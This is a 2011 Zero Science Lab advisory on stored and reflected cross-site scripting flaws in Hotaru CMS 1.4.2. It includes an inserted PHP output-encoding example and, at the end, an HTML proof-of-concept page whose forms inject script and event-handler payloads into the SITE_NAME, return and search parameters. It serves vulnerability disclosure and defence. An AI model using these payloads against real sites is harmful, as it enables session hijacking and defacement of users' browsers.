Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability

2011-11-13 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS2: 4.3 Medium (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE

EPSS: 0.01 Low (Percentile: 83.9%)

Title: Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability
Advisory ID: ZSL-2011-5057
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 13.11.2011

Summary

Hotaru CMS is an open source, PHP platform for building your own websites. With flexible plugins and themes, you can make any site you like.

Description

The CMS suffers from multiple XSS vulnerabilities. Input passed through the POST parameters 'SITE_NAME' (stored) and 'return' (reflected) and the GET parameter 'search' (reflected) to Hotaru.php is not sanitized, allowing an attacker to execute HTML and script code in a user's browser session on the affected site.
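The fix for all three sinks is context-aware output encoding (plus validation of the redirect target carried in 'return'). The following is an added example, not Hotaru CMS code: the function names are hypothetical, and the two payloads are the ones from the PoC below, URL-decoded.

```php
<?php
// Added example, not Hotaru CMS code: context-aware output encoding for the
// three sinks the advisory names (SITE_NAME stored, 'return' and 'search' reflected).
// Function names are hypothetical; the payloads are the advisory's, URL-decoded.

const SITE_NAME_PAYLOAD = '"><script>alert(1)</script>';
const ATTR_PAYLOAD      = '" onmouseover=prompt(111) bad="';

// Vulnerable pattern: the stored setting is echoed verbatim into the page.
function render_title_unsafe(string $siteName): string
{
    return "<title>{$siteName}</title>";
}

// Hardened: encode for HTML text and attribute context. ENT_QUOTES converts
// both ' and ", so the value cannot close a single- or double-quoted attribute.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_title_safe(string $siteName): string
{
    return '<title>' . esc($siteName) . '</title>';
}

// 'return' is a redirect target reflected into a hidden input: besides encoding it,
// accept only a site-relative path (no scheme, no leading "//"), so the value can
// neither break out of the attribute nor turn into an open redirect.
function safe_return_path(string $return): string
{
    return preg_match('#^/(?!/)[A-Za-z0-9_\-./?=&%]*$#', $return) === 1 ? $return : '/';
}

// The same encoding serves the reflected 'search' value.
function render_input_safe(string $name, string $value): string
{
    return '<input type="hidden" name="' . esc($name) . '" value="' . esc($value) . '">';
}

// Self-check: the hardened markup must not contain the breakout sequences.
function self_check(): bool
{
    $title = render_title_safe(SITE_NAME_PAYLOAD);
    $ret   = render_input_safe('return', safe_return_path(ATTR_PAYLOAD));
    $srch  = render_input_safe('search', ATTR_PAYLOAD);
    return strpos($title, '<script') === false
        && $ret === '<input type="hidden" name="return" value="/">'
        && strpos($srch, '" onmouseover') === false;   // quote encoded as &quot;
}

var_dump(render_title_unsafe(SITE_NAME_PAYLOAD));   // the injected tag survives
var_dump(self_check());                              // bool(true)
```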

Vendor

Hotaru CMS - <http://www.hotarucms.org>

Affected Version

1.4.2

Tested On

Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
MySQL 5.5.16
PHP 5.3.8

Vendor Status

N/A

PoC

hotarucms_xss.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://packetstormsecurity.org/files/106938>
[2] <http://securityreason.com/wlb_show/WLB-2011110045>
[3] <http://secunia.com/advisories/46842/>
[4] <http://www.securityfocus.com/bid/50657>
[5] <http://osvdb.org/show/osvdb/77095>
[6] <http://xforce.iss.net/xforce/xfdb/71300>
[7] <http://xforce.iss.net/xforce/xfdb/71301>
[8] <http://xforce.iss.net/xforce/xfdb/71302>
[9] <http://osvdb.org/show/osvdb/77680>
[10] <https://vulners.com/cve/CVE-2011-4709>
[11] <http://www.naked-security.com/nsa/201744.htm>

Changelog

[13.11.2011] - Initial release
[14.11.2011] - Added reference [1], [2] and [3]
[15.11.2011] - Added reference [4], [5], [6], [7] and [8]
[12.01.2012] - Added reference [9], [10] and [11]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<!--

Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability


Vendor: Hotaru CMS
Product web page: http://www.hotarucms.org
Affected version: 1.4.2

Summary: Hotaru CMS is an open source, PHP platform for building
your own websites. With flexible plugins and themes, you can make
any site you like.

Desc: The CMS suffers from multiple XSS vulnerabilities. Input thru
the POST parameters 'SITE_NAME' (stored), 'return' (reflected) and
the GET parameter 'search' (reflected) thru Hotaru.php, are not
sanitized allowing the attacker to execute HTML code into user's
browser session on the affected site.


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           MySQL 5.5.16
           PHP 5.3.8


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com


Advisory ID: ZSL-2011-5057
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5057.php


12.11.2011

--><html>
<head><title>Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability</title>
</head><body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script><br/>
<form action="http://localhost/hotaru-1-4-2/admin_index.php?page=settings" enctype="application/x-www-form-urlencoded" id="xss1" method="POST">
<input name="SITE_OPEN" type="hidden" value="true"/>
<input name="SITE_NAME" type="hidden" value='"&gt;&lt;script&gt;alert(1)&lt;/script&gt;'/>
<input name="THEME" type="hidden" value="default/"/>
<input name="ADMIN_THEME" type="hidden" value="admin_default/"/>
<input name="DEBUG" type="hidden" value="true"/>
<input name="FRIENDLY_URLS" type="hidden" value="false"/>
<input name="DB_CACHE" type="hidden" value="false"/>
<input name="CSS_JS_CACHE" type="hidden" value="true"/>
<input name="HTML_CACHE" type="hidden" value="true"/>
<input name="LANG_CACHE" type="hidden" value="true"/>
<input name="RSS_CACHE" type="hidden" value="true"/>
<input name="SITE_EMAIL" type="hidden" value="[email protected]"/>
<input name="SMTP" type="hidden" value="false"/>
<input name="SMTP_HOST" type="hidden" value="mail.zeroscience.mk"/>
<input name="SMTP_PORT" type="hidden" value="25"/>
<input name="SMTP_USERNAME" type="hidden" value=""/>
<input name="SMTP_PASSWORD" type="hidden" value=""/>
<input name="settings_update" type="hidden" value="true"/>
<input name="csrf" type="hidden" value="48202665ee5176f8a813e4a865381f02"/></form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>SITE_NAME Param</h3></center></a><br/>
<form action="http://localhost/hotaru-1-4-2/index.php" enctype="application/x-www-form-urlencoded" id="xss2" method="POST">
<input name="csrf" type="hidden" value="83405717529ac232d387c8df3cdb01d1"/>
<input name="page" type="hidden" value="login"/>
<input name="password" type="hidden" value=""/>
<input name="remember" type="hidden" value="1"/>
<input name="return" type="hidden" value="%22%20onmouseover%3dprompt%28111%29%20bad%3d%22"/>
<input name="username" type="hidden" value=""/></form>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>return Param</h3></center></a><br/>
<a href="http://localhost/hotaru-1-4-2/index.php?search=%22%20onmouseover%3dprompt%28111%29%20bad%3d%22" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>search Param</h3></center></a></body>
</html>
